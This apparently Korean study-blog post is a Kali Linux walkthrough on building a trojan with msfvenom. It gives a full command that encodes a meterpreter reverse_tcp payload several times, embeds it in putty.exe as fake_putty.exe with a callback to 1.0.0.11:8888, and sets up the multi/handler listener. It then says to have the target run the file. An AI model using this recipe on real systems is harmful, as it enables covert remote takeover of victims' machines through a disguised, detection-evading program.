■ 악성코드를 이용하여 공격
- 공격 대상에 악성코드를 심어 공격하는 방법
○ Metasploit 이용
- msfvenom : payload 생성 및 인코딩에 유용하게 사용할 수 있는 도구이다.
- #msfvenom -l encoder : 인코딩 리스트를 출력한다.
- -a : 아키텍처, 32bit인 경우 x86
- --platform : 플랫폼
- -p : payload
- lhost : Local Host 설정, payload에서 필요한 옵션
- lport : Local Port 설정, payload에서 필요한 옵션
- -f : 형태
- -e : 인코딩 방법, 리스트에서 확인한 것 중에 사용하면 된다.
- -i : 인코딩 횟수
- -o : 설정한 위치와 이름으로 File 생성
- 생성한 File(악성코드가 담긴)을 공격할 대상에 옮긴다.
Ex>
#msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_tcp lhost=1.0.0.11 lport=8888 -e x64/zutto_dekiru -i 3 -x putty.exe -f exe -o /root/fake_putty.exe
- msfconsole 실행
- user exploit/multi/handler : 여러 개의 모듈을 사용할 때 사용한다.
- payload 설정(File에 설정한 값과 맞아야 된다)
- option 설정(File에 설정한 값과 맞아야 된다)
- run을 하면 대기상태가 된다.
- 공격 대상 PC에서 악성파일을 실행시킨다.
- 위와 같이 Open 되었다는 내용과 meterpreter로 변경이 된다.
- 해킹이 된 것이다
'Server > 보안' 카테고리의 다른 글
Kali Linux - 취약점 분석 도구, 명령어(정보 수집 / openvas, nessus, nmap, dig, beef) (0) | 2019.07.22 |
---|---|
Kali Linux - SNMP 취약점 공격 (Metasploit 이용) (0) | 2019.07.11 |
Kali Linux - Windows EternalBlue 취약점 공격(Metasploit 이용) (0) | 2019.07.10 |
Kali Linux 한글화 (0) | 2019.07.10 |
Kali Linux 설치 (0) | 2019.07.10 |